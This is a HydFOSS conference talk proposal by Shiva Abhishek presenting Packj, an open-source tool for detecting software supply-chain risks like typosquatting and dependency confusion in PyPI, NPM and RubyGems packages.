View Schedule: HydFOSS
CFP Submissions: HydFOSS

Proposed by: Shiva Abhishek

Open-source software supply-chain risks beyond CVEs: attacks and defense

  1. Modern software apps and services are built using open-source software (OSS) because of its benefits and ease of use. Today, OSS is distributed as ready-to-use packages on popular public package registries such as PyPi, NPM, and RubyGems.
  2. Due to the widespread use and popularity, bad actors evidently leverage novel supply-chain attack vectors beyond CVEs, such as Typosquatting, Social Engineering, and Dependency Confusion to compromise OSS packages and propagate malware.
  3. Yet, there is no robust way to analyze published OSS packages and measure supply-chain cyber risks. Existing vulnerability scanners such as Dependabot assume trusted/benign third-party OSS code, and do not analyze code behavior to address these modern threats.
  4. In this talk, we will present a FOSS tool, called Packj, for developers and security researchers to mitigate OSS supply-chain attacks. Packj analyzes several codes as well as metadata attributes that make a package vulnerable to supply-chain attacks, and flags all identified “weak links’’ for deeper review.
  5. For instance, Packj scans package metadata (e.g., Readme, homepage, description) to detect whether a package is dummy/typo-squatted/troll. It checks version history and release time gaps to detect if the package is actively maintained. It flags packages with no public availability of source code repo and that lack two-factor authentication (2FA). It also carries out static+dynamic code analysis to analyze programmatic behavior, and flags the use of file systems and network APIs that can exfiltrate sensitive data.
  6. By the end of this presentation, the audience will know various open-source supply-chain attack techniques, with examples and tools/approaches for identifying risky dependencies. We will demo the tool and showcase our findings on malicious packages that we reported to PyPI and RubyGems package registries.

Source code/Reference: https://github.com/ossillate-inc/packj

Talk duration: